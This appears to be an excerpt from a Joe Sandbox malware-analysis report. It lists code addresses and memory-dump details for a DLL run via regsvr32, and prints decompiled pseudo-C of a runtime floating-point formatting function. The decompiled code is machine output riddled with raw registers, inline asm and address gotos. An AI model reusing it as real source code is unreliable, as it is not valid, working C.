                                                                                                    0x18003d92f
                                                                                                    0x18003d936
                                                                                                    0x18003d940
                                                                                                    0x18003d949
                                                                                                    0x18003d94e
                                                                                                    0x18003d955
                                                                                                    0x18003d95a
                                                                                                    0x18003d95f
                                                                                                    0x18003d965
                                                                                                    0x18003d96a
                                                                                                    0x18003d973
                                                                                                    0x18003d97c
                                                                                                    0x18003d985
                                                                                                    0x18003d98b
                                                                                                    0x18003d98e
                                                                                                    0x18003d991
                                                                                                    0x18003d9b1
                                                                                                    0x18003d9b5
                                                                                                    0x18003d9bb
                                                                                                    0x18003d9bd
                                                                                                    0x18003d9cc
                                                                                                    0x18003d9e2
                                                                                                    0x18003d9e6
                                                                                                    0x18003d9ea
                                                                                                    0x18003d9ee
                                                                                                    0x18003d9f5
                                                                                                    0x18003d9f9
                                                                                                    0x18003d9fc
                                                                                                    0x18003d9ff
                                                                                                    0x18003da04
                                                                                                    0x18003da0e
                                                                                                    0x18003da14
                                                                                                    0x18003da1e
                                                                                                    0x18003da23
                                                                                                    0x18003da29
                                                                                                    0x18003da31
                                                                                                    0x18003da31
                                                                                                    0x18003da35
                                                                                                    0x18003da3c
                                                                                                    0x18003da43
                                                                                                    0x18003da49
                                                                                                    0x18003da58
                                                                                                    0x18003da5d
                                                                                                    0x18003da62
                                                                                                    0x18003da66
                                                                                                    0x18003da74
                                                                                                    0x18003da7e
                                                                                                    0x18003da84
                                                                                                    0x18003daa2
                                                                                                    0x18003daaa
                                                                                                    0x18003dab8
                                                                                                    0x18003dabf
                                                                                                    0x18003dac3
                                                                                                    0x18003dac9
                                                                                                    0x18003dad2
                                                                                                    0x18003dad7
                                                                                                    0x18003dadf
                                                                                                    0x18003dae3
                                                                                                    0x18003daec
                                                                                                    0x18003dafb
                                                                                                    0x18003db02
                                                                                                    0x18003db11
                                                                                                    0x18003db17
                                                                                                    0x18003db22
                                                                                                    0x18003db28
                                                                                                    0x18003db2e
                                                                                                    0x18003db31
                                                                                                    0x18003db35
                                                                                                    0x18003db3f
                                                                                                    0x18003db46
                                                                                                    0x18003db50
                                                                                                    0x18003db59
                                                                                                    0x18003db5e
                                                                                                    0x18003db65
                                                                                                    0x18003db6a
                                                                                                    0x18003db6f
                                                                                                    0x18003db75
                                                                                                    0x18003db7a
                                                                                                    0x18003db81
                                                                                                    0x18003db86
                                                                                                    0x18003db8f
                                                                                                    0x18003db95
                                                                                                    0x18003db9f
                                                                                                    0x18003dba4
                                                                                                    0x18003dbae
                                                                                                    0x18003dbbe
                                                                                                    0x18003dbc7
                                                                                                    0x18003dbd0
                                                                                                    0x18003dbd9
                                                                                                    0x18003dbe2
                                                                                                    0x18003dbe8
                                                                                                    0x18003dbeb
                                                                                                    0x18003dbee
                                                                                                    0x18003dbf4
                                                                                                    0x18003dc19
                                                                                                    0x18003dc1e
                                                                                                    0x18003dc27
                                                                                                    0x18003dc2f
                                                                                                    0x18003dc37
                                                                                                    0x18003dc3e
                                                                                                    0x18003dc41
                                                                                                    0x18003dc48
                                                                                                    0x18003dc4d
                                                                                                    0x18003dc50
                                                                                                    0x18003dc53
                                                                                                    0x18003dc5a
                                                                                                    0x18003dc5f
                                                                                                    0x18003dc62
                                                                                                    0x18003dc69
                                                                                                    0x18003dc6e
                                                                                                    0x18003dc75
                                                                                                    0x18003dc7d
                                                                                                    0x18003dc81
                                                                                                    0x18003dc8e
                                                                                                    0x18003dc91
                                                                                                    0x18003dc95
                                                                                                    0x18003dc98
                                                                                                    0x18003dc9e
                                                                                                    0x18003dca9
                                                                                                    0x18003dcaf
                                                                                                    0x18003dcb3
                                                                                                    0x18003dcd2
                                                                                                    0x18003dce3
                                                                                                    0x18003dce9
                                                                                                    0x18003dd19
                                                                                                    0x18003dd1e
                                                                                                    0x18003dd27
                                                                                                    0x18003dd2d
                                                                                                    0x18003dd35
                                                                                                    0x18003dd37
                                                                                                    0x18003dd3a
                                                                                                    0x18003dd3e
                                                                                                    0x18003dd46
                                                                                                    0x18003dd4f
                                                                                                    0x18003dd55
                                                                                                    0x18003dd5b
                                                                                                    0x18003dd79
                                                                                                    0x18003dd7f
                                                                                                    0x18003dd84
                                                                                                    0x18003dd8a
                                                                                                    0x18003dd8f
                                                                                                    0x18003dd94
                                                                                                    0x18003dd98
                                                                                                    0x18003dd9b
                                                                                                    0x18003dd9d
                                                                                                    0x18003dda0
                                                                                                    0x18003dda6
                                                                                                    0x18003ddab
                                                                                                    0x18003ddaf
                                                                                                    0x18003ddb8
                                                                                                    0x18003ddbe
                                                                                                    0x18003ddc4
                                                                                                    0x18003ddc8
                                                                                                    0x18003ddcb
                                                                                                    0x18003ddd1
                                                                                                    0x18003ddd8
                                                                                                    0x18003dddf
                                                                                                    0x18003dde8
                                                                                                    0x18003dded
                                                                                                    0x18003ddf4
                                                                                                    0x18003ddf9
                                                                                                    0x18003ddfe
                                                                                                    0x18003de04
                                                                                                    0x18003de09
                                                                                                    0x18003de0f
                                                                                                    0x18003de18
                                                                                                    0x18003de21
                                                                                                    0x18003de27
                                                                                                    0x18003de2a
                                                                                                    0x18003de2d
                                                                                                    0x18003de47
                                                                                                    0x18003de4b
                                                                                                    0x18003de51
                                                                                                    0x18003de53
                                                                                                    0x18003de5f
                                                                                                    0x18003de72
                                                                                                    0x18003de76
                                                                                                    0x18003de7a
                                                                                                    0x18003de7e
                                                                                                    0x18003de85
                                                                                                    0x18003de89
                                                                                                    0x18003de8c
                                                                                                    0x18003de8f
                                                                                                    0x18003de94
                                                                                                    0x18003de9e
                                                                                                    0x18003dea4
                                                                                                    0x18003deae
                                                                                                    0x18003deb3
                                                                                                    0x18003deb9
                                                                                                    0x18003dec1
                                                                                                    0x18003dec1
                                                                                                    0x18003dec5
                                                                                                    0x18003decc
                                                                                                    0x18003ded3
                                                                                                    0x18003ded8
                                                                                                    0x18003dede
                                                                                                    0x18003dee1
                                                                                                    0x18003dee8
                                                                                                    0x18003deed
                                                                                                    0x18003def2
                                                                                                    0x18003def6
                                                                                                    0x18003df04
                                                                                                    0x18003df0e
                                                                                                    0x18003df14
                                                                                                    0x18003df32
                                                                                                    0x18003df3a
                                                                                                    0x18003df47
                                                                                                    0x18003df4e
                                                                                                    0x18003df52
                                                                                                    0x18003df58
                                                                                                    0x18003df61
                                                                                                    0x18003df66
                                                                                                    0x18003df6e
                                                                                                    0x18003df72
                                                                                                    0x18003df7b
                                                                                                    0x18003df80
                                                                                                    0x18003df8a
                                                                                                    0x18003df91
                                                                                                    0x18003dfa0
                                                                                                    0x18003dfa6
                                                                                                    0x18003dfb1
                                                                                                    0x18003dfb7
                                                                                                    0x18003dfbd
                                                                                                    0x18003dfc0
                                                                                                    0x18003dfc4
                                                                                                    0x18003dfcb
                                                                                                    0x18003dfd9
                                                                                                    0x18003dfe2
                                                                                                    0x18003dfe7
                                                                                                    0x18003dfee
                                                                                                    0x18003dff3
                                                                                                    0x18003dff8
                                                                                                    0x18003dffe
                                                                                                    0x18003e003
                                                                                                    0x18003e007
                                                                                                    0x18003e00c
                                                                                                    0x18003e015
                                                                                                    0x18003e01b
                                                                                                    0x18003e025
                                                                                                    0x18003e02a
                                                                                                    0x18003e034
                                                                                                    0x18003e042
                                                                                                    0x18003e04b
                                                                                                    0x18003e054
                                                                                                    0x18003e059
                                                                                                    0x18003e062
                                                                                                    0x18003e064
                                                                                                    0x18003e067
                                                                                                    0x18003e06a
                                                                                                    0x18003e070
                                                                                                    0x18003e08f
                                                                                                    0x18003e094
                                                                                                    0x18003e09e
                                                                                                    0x18003e0a3
                                                                                                    0x18003e0a8
                                                                                                    0x18003e0ac
                                                                                                    0x18003e0af
                                                                                                    0x18003e0b3
                                                                                                    0x18003e0b5
                                                                                                    0x18003e0c4
                                                                                                    0x18003e0c8
                                                                                                    0x18003e0d5
                                                                                                    0x18003e0d9
                                                                                                    0x18003e0db
                                                                                                    0x18003e0e3
                                                                                                    0x18003e0ee
                                                                                                    0x18003e0f0
                                                                                                    0x18003e0f3
                                                                                                    0x18003e0f9
                                                                                                    0x18003e10b
                                                                                                    0x18003e117
                                                                                                    0x18003e11c
                                                                                                    0x18003e122
                                                                                                    0x18003e127
                                                                                                    0x18003e12c
                                                                                                    0x18003e12f
                                                                                                    0x18003e131
                                                                                                    0x18003e134
                                                                                                    0x18003e142
                                                                                                    0x18003e14f
                                                                                                    0x18003e154
                                                                                                    0x18003e167
                                                                                                    0x18003e16f
                                                                                                    0x18003e179
                                                                                                    0x18003e17f
                                                                                                    0x18003e182
                                                                                                    0x18003e188
                                                                                                    0x18003e19d
                                                                                                    0x18003e1ac
                                                                                                    0x18003e1b1
                                                                                                    0x18003e1ba
                                                                                                    0x18003e1c2
                                                                                                    0x18003e1ca
                                                                                                    0x18003e1d0
                                                                                                    0x18003e1d2
                                                                                                    0x18003e1d5
                                                                                                    0x18003e1e3
                                                                                                    0x18003e1f6
                                                                                                    0x18003e1fb
                                                                                                    0x18003e1ff
                                                                                                    0x18003e201
                                                                                                    0x18003e203
                                                                                                    0x18003e207
                                                                                                    0x18003e20b
                                                                                                    0x18003e212
                                                                                                    0x18003e216
                                                                                                    0x18003e21b
                                                                                                    0x18003e223
                                                                                                    0x18003e225
                                                                                                    0x18003e22e
                                                                                                    0x18003e236
                                                                                                    0x18003e23a
                                                                                                    0x18003e240
                                                                                                    0x18003e246
                                                                                                    0x18003e24c
                                                                                                    0x18003e24f
                                                                                                    0x18003e256
                                                                                                    0x18003e25c
                                                                                                    0x18003e25f
                                                                                                    0x18003e265
                                                                                                    0x18003e27c
                                                                                                    0x18003e287
                                                                                                    0x18003e28c
                                                                                                    0x18003e292
                                                                                                    0x18003e297
                                                                                                    0x18003e29c
                                                                                                    0x18003e29f
                                                                                                    0x18003e2a1
                                                                                                    0x18003e2a4
                                                                                                    0x18003e2b2
                                                                                                    0x18003e2bf
                                                                                                    0x18003e2c4
                                                                                                    0x18003e2cb
                                                                                                    0x18003e2cf
                                                                                                    0x18003e2d4
                                                                                                    0x18003e2d7
                                                                                                    0x18003e2da
                                                                                                    0x18003e2dd
                                                                                                    0x18003e2f8
                                                                                                    0x18003e2fb
                                                                                                    0x18003e2ff
                                                                                                    0x18003e305
                                                                                                    0x18003e30a
                                                                                                    0x18003e30d
                                                                                                    0x18003e313
                                                                                                    0x18003e318
                                                                                                    0x18003e31e
                                                                                                    0x18003e322
                                                                                                    0x18003e328
                                                                                                    0x18003e32e
                                                                                                    0x18003e331
                                                                                                    0x18003e34b
                                                                                                    0x18003e34d
                                                                                                    0x18003e36a
                                                                                                    0x18003e36c
                                                                                                    0x18003e389
                                                                                                    0x18003e38b
                                                                                                    0x18003e3a8
                                                                                                    0x18003e3b3
                                                                                                    0x18003e3b5
                                                                                                    0x18003e3e1

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 2582074543-2761157908
                                                                                                    • Opcode ID: 84bbbc9bc57f6a09c8f85c338a1297134883bf9c96b5b570198c3d1a58799c10
                                                                                                    • Instruction ID: 7f7a4e9aa4611a161e733a3b49f321564e19c5e32274bc310ce73c6995058d1d
                                                                                                    • Opcode Fuzzy Hash: 84bbbc9bc57f6a09c8f85c338a1297134883bf9c96b5b570198c3d1a58799c10
                                                                                                    • Instruction Fuzzy Hash: 46B2D4726102C98BE7A78E69E4407EE77A5F39D3CCF519116EA1657B88DF34CB488B00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003ABF8 Relevance: 32.7, APIs: 17, Strings: 1, Instructions: 1165COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E0000000118003ABF8(signed int __ecx, signed int __edx, intOrPtr __edi, signed long long __rcx, long long __r8, signed int __r9, signed long long __r11) {
				void* __rbx;
				void* __rsi;
				void* _t530;
				void* _t537;
				void* _t568;
				signed long long _t573;
				intOrPtr _t580;
				void* _t587;
				void* _t604;
				signed long long _t611;
				signed long long _t616;
				intOrPtr _t623;
				void* _t630;
				void* _t647;
				signed long long _t654;
				void* _t665;
				void* _t679;
				signed int _t680;
				signed int _t681;
				signed int _t686;
				intOrPtr _t690;
				signed char _t694;
				signed long long _t716;
				signed int _t729;
				intOrPtr _t739;
				signed long long _t740;
				signed int _t746;
				signed int _t752;
				signed int _t758;
				intOrPtr _t808;
				signed int _t812;
				signed int _t819;
				signed int _t821;
				signed int _t822;
				void* _t827;
				void* _t861;
				void* _t867;
				signed long long _t984;
				signed long long _t991;
				void* _t993;
				void* _t995;
				signed long long _t1000;
				signed long long _t1001;
				signed long long _t1002;
				signed long long _t1005;
				void* _t1012;
				char* _t1013;
				signed long long _t1014;
				void* _t1016;
				signed long long _t1024;
				signed long long _t1028;
				signed long long _t1029;
				signed long long _t1038;
				signed long long _t1042;
				void* _t1054;
				signed long long _t1057;
				signed long long _t1058;
				void* _t1059;
				signed long long _t1065;
				long long _t1080;
				void* _t1091;
				signed long long _t1092;
				signed long long _t1096;
				void* _t1098;
				signed long long _t1099;
				signed long long _t1100;
				char* _t1104;
				void* _t1105;
				void* _t1106;
				signed long long _t1107;
				signed long long _t1111;
				signed long long _t1113;
				signed long long _t1121;
				signed long long _t1124;
				signed long long _t1125;
				signed long long _t1134;
				signed long long _t1137;
				signed long long _t1138;
				signed long long _t1151;
				signed long long _t1154;
				signed long long _t1156;
				signed long long _t1157;
				signed long long _t1163;

				_t1157 = __r11;
				_t1152 = __r9;
				_t1014 = __rcx;
				_t1105 = _t1106 - 0x6b8;
				_t1107 = _t1106 - 0x7b8;
				_t984 =  *0x8005d010; // 0xb03f6156e10
				 *(_t1105 + 0x6a0) = _t984 ^ _t1107;
				r14d = 1;
				 *((long long*)(_t1107 + 0x58)) =  *((intOrPtr*)(_t1105 + 0x720));
				 *((long long*)(_t1107 + 0x50)) = __r8;
				 *((intOrPtr*)(_t1107 + 0x38)) = __edx;
				asm("movsd [esp+0x48], xmm0");
				_t1057 =  *((intOrPtr*)(_t1107 + 0x48));
				 *((long long*)(_t1107 + 0x40)) = __r9;
				_t1111 = _t1057 >> 0x34;
				r9d = 0x7ff;
				_t694 = __ecx & 0xffffff00 | (__r9 & _t1111) == 0x00000000;
				asm("dec eax");
				_t1058 = _t1057 & 0xffffffff;
				asm("sbb eax, eax");
				r8d = r8d & r9d;
				_t679 = _t1111 - 0x434 +  ~( ~_t694) + r14d;
				0x80042f80();
				E00000001180042EB0( ~( ~_t694) + r14d, _t1111);
				asm("cvttsd2si ecx, xmm0");
				 *((intOrPtr*)(_t1107 + 0x64)) = __edi;
				r10d = _t1163 + 0x72;
				asm("inc ebp");
				_t1096 = ( !_t1092 & 0x00000000) + _t1058 >> 0x20;
				r12d = r12d &  ~_t694;
				 *((intOrPtr*)(_t1107 + 0x68)) = __edi;
				 *(_t1107 + 0x20) = r12d;
				asm("sbb edx, edx");
				_t746 =  ~__edx + r14d;
				 *(_t1107 + 0x60) = _t746;
				if (_t679 < 0) goto 0x8003af7d;
				 *(_t1105 + 0x308) = 0x100000;
				 *((intOrPtr*)(_t1105 + 0x304)) = 0;
				 *(_t1105 + 0x300) = 0x10000000000001;
				if (_t746 != 0x10000000000001) goto 0x8003ae62;
				r8d = 0;
				if ( *((intOrPtr*)(_t1105 + 0x304 + _t1111 * 4)) !=  *(_t1107 + 0x64 + _t1111 * 4)) goto 0x8003ae62;
				r8d = r8d + r14d;
				_t827 = r8d - 0x10000000000001;
				if (_t827 != 0) goto 0x8003ad10;
				 *(_t1107 + 0x28) =  *(_t1107 + 0x28) & 0x00000000;
				r11d = _t995 + 2;
				r9d = r11d;
				r8d = 0x20;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				_t812 = r8d - r11d;
				_t680 = _t679 - r14d;
				asm("bsr eax, edi");
				r12d = _t680;
				r12d =  !r12d;
				if (_t827 == 0) goto 0x8003ad65;
				goto 0x8003ad67;
				r8d = r8d;
				_t530 = __r9 + 2;
				r15b = r11d - r8d > 0;
				r8b = _t530 - r10d > 0;
				if (_t530 != r10d) goto 0x8003ad8b;
				if (r15b == 0) goto 0x8003ad8b;
				goto 0x8003ad8d;
				r13d = r13d | 0xffffffff;
				if (r8b != 0) goto 0x8003ae2b;
				if (0 != 0) goto 0x8003ae2b;
				r14d = 0x72;
				r14d =  <  ? _t530 : r14d;
				if (r14d == r13d) goto 0x8003ae0b;
				r8d = r14d;
				r8d = r8d - r9d;
				if (_t1111 + __r9 - r9d < 0) goto 0x8003ae0b;
				if (r8d - _t746 >= 0) goto 0x8003adcf;
				r10d =  *(_t1107 + 0x64 + _t1111 * 4);
				goto 0x8003add2;
				r10d = 0;
				if (_t1111 - 1 - _t746 >= 0) goto 0x8003ade0;
				goto 0x8003ade2;
				r8d = r8d + r13d;
				r10d = r10d & _t680;
				r10d = r10d << 0;
				 *(_t1107 + 0x64 + _t1096 * 4) = (0 & r12d) >> 0 | r10d;
				if (_t1111 + __r9 == r13d) goto 0x8003ae0b;
				_t752 =  *(_t1107 + 0x60);
				goto 0x8003adba;
				if (r9d == 0) goto 0x8003ae1e;
				 *(_t1107 + 0x64 + _t1014 * 4) =  *(_t1107 + 0x64 + _t1014 * 4) & 0x00000000;
				if (1 != r9d) goto 0x8003ae12;
				r14d =  !=  ? _t1163 + 1 : r14d;
				goto 0x8003ae2e;
				r14d = 0;
				 *(_t1105 + 0x134) = 4;
				 *(_t1105 + 0x308) =  *(_t1105 + 0x308) & 0x00000000;
				r15d = 1;
				r12d =  *(_t1107 + 0x20);
				 *(_t1105 + 0x130) = r15d;
				 *(_t1105 + 0x300) = r15d;
				 *(_t1107 + 0x60) = r14d;
				goto 0x8003b1ca;
				 *(_t1107 + 0x28) =  *(_t1107 + 0x28) & 0x00000000;
				r11d = (_t1163 << _t812) + 1;
				r9d = r11d;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				r8d = 0x20;
				r15d = r8d;
				r15d = r15d - r11d;
				_t681 = _t680 - r14d;
				asm("bsr eax, [esp+eax*4+0x64]");
				r13d = _t681;
				r13d =  !r13d;
				if (r15b == 0) goto 0x8003aea4;
				goto 0x8003aea6;
				r8d = r8d;
				_t537 = _t1058 + __r9;
				r12b = r11d - r8d > 0;
				r8b = _t537 - r10d > 0;
				if (_t537 != r10d) goto 0x8003aeca;
				if (r12b == 0) goto 0x8003aeca;
				goto 0x8003aecc;
				r10d = r10d | 0xffffffff;
				if (r8b != 0) goto 0x8003af6f;
				if (0 != 0) goto 0x8003af6f;
				r14d = 0x72;
				r14d =  <  ? _t537 : r14d;
				if (r14d == r10d) goto 0x8003af4f;
				r8d = r14d;
				r8d = r8d - r9d;
				if (_t1111 + __r9 - r9d < 0) goto 0x8003af4f;
				if (r8d - _t752 >= 0) goto 0x8003af0e;
				r10d =  *(_t1107 + 0x64 + _t1111 * 4);
				goto 0x8003af11;
				r10d = 0;
				if (_t1111 - 1 - _t752 >= 0) goto 0x8003af1f;
				goto 0x8003af21;
				r10d = r10d & _t681;
				r10d = r10d << 0;
				r10d = r10d | 0xffffffff;
				r8d = r8d + r10d;
				 *(_t1107 + 0x64 + _t1096 * 4) = (0 & r13d) >> 0 | r10d;
				if (_t1111 + __r9 == r10d) goto 0x8003af4f;
				_t758 =  *(_t1107 + 0x60);
				goto 0x8003aef9;
				if (r9d == 0) goto 0x8003af62;
				 *(_t1107 + 0x64 + _t1014 * 4) =  *(_t1107 + 0x64 + _t1014 * 4) & 0x00000000;
				if (1 != r9d) goto 0x8003af56;
				r14d =  !=  ? _t1163 + 1 : r14d;
				goto 0x8003af72;
				r14d = 0;
				 *(_t1105 + 0x134) = _t812;
				goto 0x8003ae38;
				if (_t681 == 0xfffffc02) goto 0x8003b0b9;
				 *(_t1105 + 0x308) = 0x100000;
				 *((intOrPtr*)(_t1105 + 0x304)) = 0;
				 *(_t1105 + 0x300) = 0x10000000000001;
				if (_t758 != 0x10000000000001) goto 0x8003b0b9;
				r8d = 0;
				if ( *((intOrPtr*)(_t1105 + 0x304 + _t1111 * 4)) !=  *(_t1107 + 0x64 + _t1111 * 4)) goto 0x8003b0b9;
				r8d = r8d + r14d;
				_t861 = r8d - 0x10000000000001;
				if (_t861 != 0) goto 0x8003afaf;
				 *(_t1107 + 0x28) =  *(_t1107 + 0x28) & 0x00000000;
				asm("bsr eax, edi");
				if (_t861 == 0) goto 0x8003afd8;
				goto 0x8003afda;
				r8d = 0x20;
				r8d = r8d;
				r9b = r8d - 0x10000000000001 > 0;
				r13d = r13d | 0xffffffff;
				if (0x10000000000001 - _t758 >= 0) goto 0x8003affd;
				r8d =  *(_t1107 + 0x40000000000060);
				goto 0x8003b000;
				r8d = 0;
				_t102 = _t1014 - 1; // 0x1
				if (_t102 - _t758 >= 0) goto 0x8003b00d;
				goto 0x8003b00f;
				 *(_t1107 + 0x40000000000060) = 0 >> 0x0000001e ^ r8d << 0x00000002;
				if (0x10000000000001 + r13d == r13d) goto 0x8003b02e;
				goto 0x8003aff0;
				r9b =  ~r9b;
				asm("inc ebp");
				r14d =  ~r14d;
				r14d = r14d + 0x10000000000001;
				 *(_t1107 + 0x60) = r14d;
				_t1000 = _t1163 << 0 << 2;
				memset(??, ??, ??);
				_t112 = _t1096 + 1; // 0x3
				r15d = _t112;
				 *(_t1105 + _t1000 + 0x304) = 1;
				r8d = r15d;
				_t1113 = _t1000 << 2;
				 *(_t1105 + 0x300) = r15d;
				 *(_t1105 + 0x130) = r15d;
				if (_t1113 == 0) goto 0x8003b1ca;
				_t1016 = _t1105 + 0x134;
				_t867 = _t1113 - _t1000;
				if (_t867 > 0) goto 0x8003b1a9;
				_t1059 = _t1105 + 0x304;
				E0000000118000EEF0(1 << sil, _t1016, _t1059, _t1113);
				goto 0x8003b1c3;
				 *(_t1107 + 0x28) =  *(_t1107 + 0x28) & 0x00000000;
				asm("bsr eax, [esp+eax*4+0x64]");
				if (_t867 == 0) goto 0x8003b0ce;
				goto 0x8003b0d0;
				r8d = 0x20;
				r8d = r8d;
				r9b = r8d - r14d > 0;
				if (0 != r10d) goto 0x8003b0f5;
				if (r9b == 0) goto 0x8003b0f5;
				goto 0x8003b0f7;
				r13d = r13d | 0xffffffff;
				if ((_t1059 - 0x00000001 & 0xffffff00 | 0 - r10d > 0x00000000) != 0) goto 0x8003b161;
				if (0 != 0) goto 0x8003b161;
				r14d = 0x72;
				r14d =  <  ? 0 : r14d;
				if (r14d == r13d) goto 0x8003b154;
				_t716 = r14d;
				if (_t716 >= 0) goto 0x8003b125;
				r8d =  *(_t1107 + 0x40000000000060);
				goto 0x8003b128;
				r8d = 0;
				if (_t1016 - 1 >= 0) goto 0x8003b135;
				goto 0x8003b137;
				 *(_t1107 + 0x40000000000060) = 0 >> 0x0000001f ^ _t1113 + _t1113;
				if (_t716 + r13d == r13d) goto 0x8003b154;
				goto 0x8003b118;
				r14d =  !=  ? _t1163 + 1 : r14d;
				goto 0x8003b164;
				r14d = 0;
				 *(_t1107 + 0x60) = r14d;
				_t1001 = _t1000 << 2;
				memset(??, ??, ??);
				_t139 = _t1099 + 1; // 0x2
				r15d = _t139;
				 *(_t1105 + _t1001 + 0x304) = 1 << dil;
				goto 0x8003b075;
				memset(??, ??, ??);
				_t568 = E0000000118002E69C(0xffffffff);
				 *0xffffffff = 0x22;
				E0000000118002E4F0(_t568);
				r15d =  *(_t1105 + 0x130);
				if (r12d < 0) goto 0x8003b680;
				_t573 = 0xcccccccd * r12d >> 0x20 >> 3;
				 *(_t1107 + 0x34) = _t573;
				r12d = _t573;
				 *(_t1107 + 0x24) = _t573;
				if (_t573 == 0) goto 0x8003b5c9;
				r13d = r12d;
				r13d =  >  ? 0x26 : r13d;
				 *(_t1107 + 0x30) = r13d;
				_t1002 = _t1001 << 2;
				 *(_t1105 + 0x300) = _t1099 + _t1105 + 0x304;
				memset(??, ??, ??);
				_t1100 = _t1099 << 2;
				E0000000118000EEF0( *(0x180000000 + 0x512f0 + _t1096 * 4) & 0x0000ffff, _t1105 + 0x304 + _t1002, 0x400001800509dc, _t1100);
				r11d =  *(_t1105 + 0x300);
				if (r11d - 1 > 0) goto 0x8003b327;
				_t580 =  *((intOrPtr*)(_t1105 + 0x304));
				if (_t580 != 0) goto 0x8003b29e;
				r15d = 0;
				 *(_t1105 + 0x130) = r15d;
				goto 0x8003b5a6;
				if (_t580 == 1) goto 0x8003b5a6;
				if (r15d == 0) goto 0x8003b5a6;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x8003b2b9;
				if (r8d == 0) goto 0x8003b31b;
				if ( *(_t1105 + 0x130) - 0x73 >= 0) goto 0x8003b30a;
				 *(_t1105 + 0x40000000000130) = r8d;
				r15d =  *(_t1105 + 0x130);
				r15d = r15d + 1;
				goto 0x8003b292;
				r15d = 0;
				 *(_t1105 + 0x130) = r15d;
				goto 0x8003b5a8;
				r15d =  *(_t1105 + 0x130);
				goto 0x8003b5a6;
				if (r15d - 1 > 0) goto 0x8003b3de;
				_t686 =  *(_t1105 + 0x134);
				_t1121 = _t1157 << 2;
				r15d = r11d;
				 *(_t1105 + 0x130) = r11d;
				if (_t1121 == 0) goto 0x8003b38d;
				_t1024 = _t1105 + 0x134;
				if (_t1121 - 0xffffffff > 0) goto 0x8003b36c;
				E0000000118000EEF0(0x1cc, _t1024, _t1105 + 0x304, _t1121);
				goto 0x8003b386;
				memset(??, ??, ??);
				_t587 = E0000000118002E69C(0xffffffff);
				 *0xffffffff = 0x22;
				E0000000118002E4F0(_t587);
				r15d =  *(_t1105 + 0x130);
				if (_t686 == 0) goto 0x8003b28f;
				if (_t686 == 1) goto 0x8003b5a6;
				if (r15d == 0) goto 0x8003b5a6;
				r8d = 0;
				_t1154 = _t1002;
				r9d = 0;
				_t1124 = _t1024 * _t1154 + 0xffffffff >> 0x20;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x8003b3b0;
				goto 0x8003b2e2;
				r12d = r15d;
				_t1160 =  ==  ? _t1105 + 0x134 : _t1105 + 0x304;
				r12d =  !=  ? r11d : r12d;
				r11d =  !=  ? r15d : r11d;
				_t1028 = _t1105 + 0x304;
				_t1065 =  ==  ? _t1028 : _t1105 + 0x134;
				r15d = 0;
				r10d = 0;
				 *(_t1107 + 0x28) = _t1065;
				 *(_t1105 + 0x4d0) = r15d;
				if (r12d == 0) goto 0x8003b549;
				_t819 =  *(( ==  ? _t1105 + 0x134 : _t1105 + 0x304) + _t1154 * 4);
				if (_t819 != 0) goto 0x8003b45d;
				if (r10d != r15d) goto 0x8003b53d;
				 *(_t1105 + 0x4d4 + _t1154 * 4) =  *(_t1105 + 0x4d4 + _t1154 * 4) & _t819;
				_t213 = _t1154 + 1; // 0x1
				r15d = _t213;
				 *(_t1105 + 0x4d0) = r15d;
				goto 0x8003b53d;
				r9d = r10d;
				if (r11d == 0) goto 0x8003b52e;
				if (r9d == 0x73) goto 0x8003b4dc;
				if (r9d != r15d) goto 0x8003b495;
				_t215 = _t1096 + 1; // 0x1
				 *(_t1105 + 0x400000000004d0) =  *(_t1105 + 0x400000000004d0) & 0x00000000;
				 *(_t1105 + 0x4d0) = _t215 + __r9 + _t1154;
				r8d = r9d;
				r9d = r9d + 1;
				 *((intOrPtr*)(_t1105 + 0x4d4 + _t1124 * 4)) =  *((intOrPtr*)(_t1065 + 0x3ffffffffffffc));
				r15d =  *(_t1105 + 0x4d0);
				if (__r9 + _t1096 == r11d) goto 0x8003b4dc;
				goto 0x8003b470;
				if (0 == 0) goto 0x8003b52e;
				if (r9d == 0x73) goto 0x8003b656;
				if (r9d != r15d) goto 0x8003b504;
				 *(_t1105 + 0x400000000004d0) =  *(_t1105 + 0x400000000004d0) & 0x00000000;
				_t242 = _t1152 + 1; // 0x1
				 *(_t1105 + 0x4d0) = _t242;
				r9d = r9d + 1;
				 *((intOrPtr*)(_t1105 + 0x4d4 + _t1028 * 4)) = 0;
				r15d =  *(_t1105 + 0x4d0);
				if (0 != 0) goto 0x8003b4e0;
				if (r9d == 0x73) goto 0x8003b656;
				r10d = r10d + 1;
				if (r10d != r12d) goto 0x8003b430;
				r8d = r15d;
				_t1125 = _t1124 << 2;
				 *(_t1105 + 0x130) = r15d;
				if (_t1125 == 0) goto 0x8003b59c;
				_t1029 = _t1105 + 0x134;
				if (_t1125 - 0xffffffff > 0) goto 0x8003b57b;
				E0000000118000EEF0(0x1cc, _t1029, _t1105 + 0x4d4, _t1125);
				goto 0x8003b595;
				memset(??, ??, ??);
				_t604 = E0000000118002E69C(0xffffffff);
				 *0xffffffff = 0x22;
				E0000000118002E4F0(_t604);
				r15d =  *(_t1105 + 0x130);
				r12d =  *(_t1107 + 0x24);
				r13d =  *(_t1107 + 0x30);
				if (1 == 0) goto 0x8003b656;
				r12d = r12d - r13d;
				 *(_t1107 + 0x24) = r12d;
